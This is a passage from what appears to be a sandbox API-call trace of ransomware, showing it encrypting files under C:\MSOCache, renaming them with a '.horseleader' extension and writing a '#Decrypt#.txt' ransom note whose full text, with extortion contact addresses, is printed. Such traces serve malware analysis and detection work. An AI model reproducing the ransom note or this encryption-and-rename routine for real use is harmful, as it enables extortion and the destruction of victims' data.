(in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.314] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.314] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0168.315] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0168.315] CloseHandle (hObject=0x158) returned 1 [0171.510] GetProcessHeap () returned 0x780000 [0171.510] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0171.510] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.horseleader") returned 97 [0171.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.horseleader")) returned 1 [0171.511] GetProcessHeap () returned 0x780000 [0171.511] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 
| out: hHeap=0x780000) returned 1 [0171.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0171.512] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0171.512] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0171.512] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0171.512] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0171.512] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0171.512] lstrlenW (lpString=".testttjffg") returned 11 [0171.512] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpSrch=".testttjffg") returned 0x0 [0171.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0171.513] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0171.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x158 [0171.513] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0171.513] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0171.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=875520) returned 1 [0171.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.391] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x68600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.532] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.591] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.592] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xd0c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.592] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.709] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.726] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0172.735] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0172.735] CloseHandle (hObject=0x158) returned 1 [0172.901] GetProcessHeap () returned 0x780000 [0172.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0172.902] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.horseleader") returned 97 [0172.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), 
lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.horseleader")) returned 1 [0172.903] GetProcessHeap () returned 0x780000 [0172.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0172.903] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0172.903] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0172.903] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0172.903] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 [0172.903] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0172.903] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0172.904] lstrlenW (lpString=".testttjffg") returned 11 [0172.904] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0172.904] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0172.904] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0172.904] 
CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0172.904] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0172.905] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0172.905] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1347) returned 1 [0172.905] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x543, lpOverlapped=0x0) returned 1 [0172.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.995] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x543, lpOverlapped=0x0) returned 1 [0172.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.995] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0172.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0172.996] CloseHandle (hObject=0x158) 
returned 1 [0173.000] GetProcessHeap () returned 0x780000 [0173.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0173.001] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.horseleader") returned 97 [0173.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.horseleader")) returned 1 [0173.004] GetProcessHeap () returned 0x780000 [0173.004] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0173.004] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0173.004] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0173.004] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\#Decrypt#.txt") returned 89 [0173.005] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\#Decrypt#.txt" (normalized: "c:\\msocache\\all 
users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0173.005] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0173.005] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0173.007] lstrlenA (lpString="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") returned 1368 [0173.007] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0173.007] CloseHandle (hObject=0x21c) returned 1 [0173.007] GetProcessHeap () returned 0x780000 [0173.008] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0173.008] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0173.008] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0173.008] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 75 [0173.008] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0173.008] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0173.008] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0173.008] GetProcessHeap () returned 0x780000 [0173.008] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0173.008] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned 77 [0173.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0173.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0173.009] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.") returned 77 [0173.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0173.009] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0173.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0173.010] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\..") returned 78 [0173.010] 
lstrcmpW (lpString1="..", lpString2=".") returned 1 [0173.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0173.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0173.010] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0173.010] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0173.010] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0173.010] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0173.010] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0173.011] lstrlenW (lpString=".testttjffg") returned 11 [0173.011] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0173.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0173.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0173.011] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0173.012] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0173.012] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0173.012] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13642474) returned 1 [0173.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.081] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.081] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x67ed75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.082] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.085] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.085] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, 
lpOverlapped=0x0) returned 1 [0173.085] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcfdaea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.085] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.093] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.095] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0173.096] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 